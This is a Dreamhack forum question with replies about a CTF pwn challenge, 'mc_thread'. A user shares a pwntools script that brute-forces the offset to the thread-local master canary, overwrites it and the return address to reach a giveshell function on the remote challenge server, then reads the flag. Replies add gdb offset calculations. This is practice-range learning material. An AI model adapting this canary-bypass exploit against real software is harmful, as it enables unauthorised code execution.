완료됨
Do I need to to fuzz?

The exploit (that dreamhack shows on exploit tech) works perfectly on local, but on remote it doesn't work... I try to bruteforce the distance between payload and master canary, Here is my script

`from pwn import *
context.log_level = 'debug'
for i in range(400, 9000, 8):
	p = remote("host3.dreamhack.games", 17226)

	elf = ELF('./mc_thread')


	payload = b'A' * 264

	payload += b'A' * 8 # canary

	payload += b'B' * 8

	payload += p64(elf.symbols['giveshell'])

	payload += b'C' * (i - len(payload))

	payload += p64(0x404800 - 0x972)

	payload += b'C' * (0x10)

	payload += p64(0x4141414141414141)

	inp_sz = len(payload) // 8

	p.sendlineafter(b'Size: ', str(inp_sz).encode())

	p.sendafter(b'Data: ', payload)
	p.sendline("cat flag")
	data = p.recvallS(timeout=3)
	if "DH{" in data:
		print(data)
		break`

Is it like an overkill and I can understand the distance there is on remote? or I really need to do bruteforce? Thanks in advance

#system_hacking #master_canary #mc_thread
작성자 정보
더 깊이 있는 답변이 필요할 때
드림핵 팀과 멘토에게 직접 문의해 보세요!
답변 2
avatar
wyv3rn
무플 방지 위원회장
avatar
wyv3rn
무플 방지 위원회장

as you know, offset can be changed according to the environment. so bf is necessary i think.

2023.09.21. 21:42
avatar
FRACCHETTO
대표 업적 없음
avatar
FRACCHETTO
대표 업적 없음

If run on the dockerfile the distance is kinda large, but the steps are also the ones shown in the exploit tech page...

(gdb) x/x $rbp-0x110
0x7ffff7d8bd40:	0x0000000000000000
(gdb) x/gx $fs_base+0x28
0x7ffff7d8c668:	0x8d3bade0f4598900
(gdb) p/x ($fs_base + 0x28) - 0x7ffff7d7dd40
$1 = 0xe928
2023.09.21. 22:07